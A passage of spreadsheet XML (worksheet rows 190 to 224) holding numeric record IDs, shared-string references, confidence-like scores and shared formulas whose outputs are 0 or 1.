      </c>
      <c r="K190" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L190" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O190" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="62">
        <v>117680.0</v>
      </c>
      <c r="B191" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C191" s="63" t="s">
        <v>742</v>
      </c>
      <c r="D191" s="62" t="s">
        <v>743</v>
      </c>
      <c r="E191" s="62" t="s">
        <v>744</v>
      </c>
      <c r="F191" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G191" s="62">
        <v>0.9</v>
      </c>
      <c r="H191" s="64">
        <v>1.0</v>
      </c>
      <c r="I191" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J191" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K191" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L191" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O191" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="62">
        <v>117709.0</v>
      </c>
      <c r="B192" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C192" s="63" t="s">
        <v>745</v>
      </c>
      <c r="D192" s="62" t="s">
        <v>746</v>
      </c>
      <c r="E192" s="62" t="s">
        <v>747</v>
      </c>
      <c r="F192" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G192" s="62">
        <v>0.9</v>
      </c>
      <c r="H192" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I192" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J192" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K192" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L192" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O192" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="62">
        <v>117710.0</v>
      </c>
      <c r="B193" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C193" s="63" t="s">
        <v>748</v>
      </c>
      <c r="D193" s="62" t="s">
        <v>749</v>
      </c>
      <c r="E193" s="62" t="s">
        <v>750</v>
      </c>
      <c r="F193" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G193" s="62">
        <v>0.95</v>
      </c>
      <c r="H193" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I193" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J193" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K193" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L193" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O193" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="62">
        <v>117711.0</v>
      </c>
      <c r="B194" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C194" s="63" t="s">
        <v>751</v>
      </c>
      <c r="D194" s="62" t="s">
        <v>752</v>
      </c>
      <c r="E194" s="62" t="s">
        <v>753</v>
      </c>
      <c r="F194" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G194" s="62">
        <v>0.95</v>
      </c>
      <c r="H194" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I194" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J194" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K194" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L194" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O194" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="62">
        <v>117712.0</v>
      </c>
      <c r="B195" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C195" s="63" t="s">
        <v>754</v>
      </c>
      <c r="D195" s="62" t="s">
        <v>755</v>
      </c>
      <c r="E195" s="62" t="s">
        <v>756</v>
      </c>
      <c r="F195" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G195" s="62">
        <v>0.95</v>
      </c>
      <c r="H195" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I195" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J195" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K195" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L195" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O195" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="62">
        <v>118273.0</v>
      </c>
      <c r="B196" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C196" s="63" t="s">
        <v>757</v>
      </c>
      <c r="D196" s="62" t="s">
        <v>758</v>
      </c>
      <c r="E196" s="62" t="s">
        <v>759</v>
      </c>
      <c r="F196" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G196" s="62">
        <v>0.9</v>
      </c>
      <c r="H196" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I196" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J196" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K196" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L196" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O196" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="62">
        <v>118274.0</v>
      </c>
      <c r="B197" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C197" s="63" t="s">
        <v>760</v>
      </c>
      <c r="D197" s="62" t="s">
        <v>761</v>
      </c>
      <c r="E197" s="62" t="s">
        <v>762</v>
      </c>
      <c r="F197" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G197" s="62">
        <v>0.9</v>
      </c>
      <c r="H197" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I197" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J197" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K197" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L197" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O197" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="62">
        <v>118320.0</v>
      </c>
      <c r="B198" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C198" s="63" t="s">
        <v>763</v>
      </c>
      <c r="D198" s="62" t="s">
        <v>764</v>
      </c>
      <c r="E198" s="62" t="s">
        <v>765</v>
      </c>
      <c r="F198" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G198" s="62">
        <v>0.9</v>
      </c>
      <c r="H198" s="64">
        <v>1.0</v>
      </c>
      <c r="I198" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J198" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K198" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L198" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O198" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="62">
        <v>118401.0</v>
      </c>
      <c r="B199" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C199" s="63" t="s">
        <v>766</v>
      </c>
      <c r="D199" s="62" t="s">
        <v>767</v>
      </c>
      <c r="E199" s="62" t="s">
        <v>768</v>
      </c>
      <c r="F199" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G199" s="62">
        <v>0.9</v>
      </c>
      <c r="H199" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I199" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J199" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K199" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L199" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O199" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="62">
        <v>118405.0</v>
      </c>
      <c r="B200" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C200" s="63" t="s">
        <v>769</v>
      </c>
      <c r="D200" s="62" t="s">
        <v>770</v>
      </c>
      <c r="E200" s="62" t="s">
        <v>771</v>
      </c>
      <c r="F200" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G200" s="62">
        <v>0.9</v>
      </c>
      <c r="H200" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I200" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J200" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K200" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L200" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O200" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="62">
        <v>119035.0</v>
      </c>
      <c r="B201" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C201" s="63" t="s">
        <v>772</v>
      </c>
      <c r="D201" s="62" t="s">
        <v>773</v>
      </c>
      <c r="E201" s="62" t="s">
        <v>774</v>
      </c>
      <c r="F201" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G201" s="62">
        <v>0.9</v>
      </c>
      <c r="H201" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I201" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J201" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K201" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L201" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O201" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="62">
        <v>119036.0</v>
      </c>
      <c r="B202" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C202" s="63" t="s">
        <v>775</v>
      </c>
      <c r="D202" s="62" t="s">
        <v>776</v>
      </c>
      <c r="E202" s="62" t="s">
        <v>777</v>
      </c>
      <c r="F202" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G202" s="62">
        <v>0.9</v>
      </c>
      <c r="H202" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I202" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J202" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K202" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L202" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O202" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="62">
        <v>119155.0</v>
      </c>
      <c r="B203" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C203" s="63" t="s">
        <v>778</v>
      </c>
      <c r="D203" s="62" t="s">
        <v>779</v>
      </c>
      <c r="E203" s="62" t="s">
        <v>780</v>
      </c>
      <c r="F203" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G203" s="62">
        <v>0.85</v>
      </c>
      <c r="H203" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I203" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J203" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K203" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L203" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O203" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="62">
        <v>119332.0</v>
      </c>
      <c r="B204" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C204" s="63" t="s">
        <v>782</v>
      </c>
      <c r="D204" s="62" t="s">
        <v>783</v>
      </c>
      <c r="E204" s="62" t="s">
        <v>784</v>
      </c>
      <c r="F204" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G204" s="62">
        <v>0.95</v>
      </c>
      <c r="H204" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I204" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J204" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K204" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L204" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O204" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="62">
        <v>119355.0</v>
      </c>
      <c r="B205" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C205" s="63" t="s">
        <v>785</v>
      </c>
      <c r="D205" s="62" t="s">
        <v>786</v>
      </c>
      <c r="E205" s="62" t="s">
        <v>787</v>
      </c>
      <c r="F205" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G205" s="62">
        <v>0.85</v>
      </c>
      <c r="H205" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I205" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J205" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K205" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L205" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O205" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="62">
        <v>119432.0</v>
      </c>
      <c r="B206" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C206" s="63" t="s">
        <v>788</v>
      </c>
      <c r="D206" s="62" t="s">
        <v>789</v>
      </c>
      <c r="E206" s="62" t="s">
        <v>790</v>
      </c>
      <c r="F206" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G206" s="62">
        <v>0.95</v>
      </c>
      <c r="H206" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I206" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J206" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K206" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L206" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O206" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="62">
        <v>119510.0</v>
      </c>
      <c r="B207" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C207" s="63" t="s">
        <v>791</v>
      </c>
      <c r="D207" s="62" t="s">
        <v>792</v>
      </c>
      <c r="E207" s="62" t="s">
        <v>793</v>
      </c>
      <c r="F207" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G207" s="62">
        <v>0.9</v>
      </c>
      <c r="H207" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I207" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J207" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K207" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L207" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O207" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="62">
        <v>119804.0</v>
      </c>
      <c r="B208" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C208" s="63" t="s">
        <v>794</v>
      </c>
      <c r="D208" s="62" t="s">
        <v>795</v>
      </c>
      <c r="E208" s="62" t="s">
        <v>796</v>
      </c>
      <c r="F208" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G208" s="62">
        <v>0.95</v>
      </c>
      <c r="H208" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I208" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J208" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K208" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L208" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O208" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="62">
        <v>119805.0</v>
      </c>
      <c r="B209" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C209" s="63" t="s">
        <v>797</v>
      </c>
      <c r="D209" s="62" t="s">
        <v>798</v>
      </c>
      <c r="E209" s="62" t="s">
        <v>799</v>
      </c>
      <c r="F209" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G209" s="62">
        <v>0.95</v>
      </c>
      <c r="H209" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I209" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J209" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K209" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L209" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O209" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="62">
        <v>119806.0</v>
      </c>
      <c r="B210" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C210" s="63" t="s">
        <v>800</v>
      </c>
      <c r="D210" s="62" t="s">
        <v>801</v>
      </c>
      <c r="E210" s="62" t="s">
        <v>802</v>
      </c>
      <c r="F210" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G210" s="62">
        <v>0.9</v>
      </c>
      <c r="H210" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I210" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J210" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K210" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L210" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O210" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="62">
        <v>120597.0</v>
      </c>
      <c r="B211" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C211" s="63" t="s">
        <v>803</v>
      </c>
      <c r="D211" s="62" t="s">
        <v>804</v>
      </c>
      <c r="E211" s="62" t="s">
        <v>805</v>
      </c>
      <c r="F211" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G211" s="62">
        <v>0.8</v>
      </c>
      <c r="H211" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I211" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J211" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K211" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L211" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O211" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="62">
        <v>121128.0</v>
      </c>
      <c r="B212" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C212" s="63" t="s">
        <v>806</v>
      </c>
      <c r="D212" s="62" t="s">
        <v>807</v>
      </c>
      <c r="E212" s="62" t="s">
        <v>808</v>
      </c>
      <c r="F212" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G212" s="62">
        <v>0.9</v>
      </c>
      <c r="H212" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I212" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J212" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K212" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L212" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O212" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="62">
        <v>121186.0</v>
      </c>
      <c r="B213" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C213" s="63" t="s">
        <v>809</v>
      </c>
      <c r="D213" s="62" t="s">
        <v>810</v>
      </c>
      <c r="E213" s="62" t="s">
        <v>811</v>
      </c>
      <c r="F213" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G213" s="62">
        <v>0.85</v>
      </c>
      <c r="H213" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I213" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J213" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K213" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L213" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O213" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="62">
        <v>121287.0</v>
      </c>
      <c r="B214" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C214" s="63" t="s">
        <v>812</v>
      </c>
      <c r="D214" s="62" t="s">
        <v>813</v>
      </c>
      <c r="E214" s="62" t="s">
        <v>814</v>
      </c>
      <c r="F214" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G214" s="62">
        <v>0.85</v>
      </c>
      <c r="H214" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I214" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J214" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K214" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L214" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O214" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="62">
        <v>121337.0</v>
      </c>
      <c r="B215" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C215" s="63" t="s">
        <v>815</v>
      </c>
      <c r="D215" s="62" t="s">
        <v>816</v>
      </c>
      <c r="E215" s="62" t="s">
        <v>817</v>
      </c>
      <c r="F215" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G215" s="62">
        <v>0.9</v>
      </c>
      <c r="H215" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I215" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J215" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K215" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L215" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O215" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="62">
        <v>121354.0</v>
      </c>
      <c r="B216" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C216" s="63" t="s">
        <v>818</v>
      </c>
      <c r="D216" s="62" t="s">
        <v>819</v>
      </c>
      <c r="E216" s="62" t="s">
        <v>820</v>
      </c>
      <c r="F216" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G216" s="62">
        <v>0.9</v>
      </c>
      <c r="H216" s="64" t="s">
        <v>781</v>
      </c>
      <c r="I216" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J216" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K216" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L216" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O216" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="62">
        <v>121443.0</v>
      </c>
      <c r="B217" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C217" s="63" t="s">
        <v>821</v>
      </c>
      <c r="D217" s="62" t="s">
        <v>822</v>
      </c>
      <c r="E217" s="62" t="s">
        <v>823</v>
      </c>
      <c r="F217" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G217" s="62">
        <v>0.95</v>
      </c>
      <c r="H217" s="64">
        <v>1.0</v>
      </c>
      <c r="I217" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J217" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K217" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L217" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O217" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="62">
        <v>121513.0</v>
      </c>
      <c r="B218" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C218" s="63" t="s">
        <v>824</v>
      </c>
      <c r="D218" s="62" t="s">
        <v>825</v>
      </c>
      <c r="E218" s="62" t="s">
        <v>826</v>
      </c>
      <c r="F218" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G218" s="62">
        <v>0.9</v>
      </c>
      <c r="H218" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I218" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J218" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K218" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L218" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O218" s="65">
        <v>1.0</v>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="62">
        <v>121611.0</v>
      </c>
      <c r="B219" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C219" s="63" t="s">
        <v>827</v>
      </c>
      <c r="D219" s="62" t="s">
        <v>828</v>
      </c>
      <c r="E219" s="62" t="s">
        <v>829</v>
      </c>
      <c r="F219" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G219" s="62">
        <v>0.85</v>
      </c>
      <c r="H219" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I219" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J219" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K219" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L219" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O219" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="62">
        <v>121642.0</v>
      </c>
      <c r="B220" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C220" s="63" t="s">
        <v>830</v>
      </c>
      <c r="D220" s="62" t="s">
        <v>831</v>
      </c>
      <c r="E220" s="62" t="s">
        <v>832</v>
      </c>
      <c r="F220" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G220" s="62">
        <v>0.9</v>
      </c>
      <c r="H220" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I220" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J220" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K220" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L220" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O220" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="62">
        <v>121748.0</v>
      </c>
      <c r="B221" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C221" s="63" t="s">
        <v>833</v>
      </c>
      <c r="D221" s="62" t="s">
        <v>834</v>
      </c>
      <c r="E221" s="62" t="s">
        <v>835</v>
      </c>
      <c r="F221" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G221" s="62">
        <v>0.85</v>
      </c>
      <c r="H221" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I221" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J221" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K221" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L221" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O221" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="62">
        <v>121867.0</v>
      </c>
      <c r="B222" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C222" s="63" t="s">
        <v>836</v>
      </c>
      <c r="D222" s="62" t="s">
        <v>837</v>
      </c>
      <c r="E222" s="62" t="s">
        <v>838</v>
      </c>
      <c r="F222" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G222" s="62">
        <v>0.9</v>
      </c>
      <c r="H222" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I222" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J222" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K222" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L222" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O222" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="62">
        <v>121913.0</v>
      </c>
      <c r="B223" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C223" s="63" t="s">
        <v>839</v>
      </c>
      <c r="D223" s="62" t="s">
        <v>840</v>
      </c>
      <c r="E223" s="62" t="s">
        <v>841</v>
      </c>
      <c r="F223" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G223" s="62">
        <v>0.95</v>
      </c>
      <c r="H223" s="64">
        <v>1.0</v>
      </c>
      <c r="I223" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J223" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K223" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L223" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O223" s="65">
        <v>0.0</v>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="62">
        <v>121964.0</v>
      </c>
      <c r="B224" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C224" s="63" t="s">
        <v>842</v>
      </c>
      <c r="D224" s="62" t="s">
        <v>843</v>
      </c>
      <c r="E224" s="62" t="s">
        <v>844</v>
      </c>
      <c r="F224" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G224" s="62">
        <v>0.85</v>
      </c>
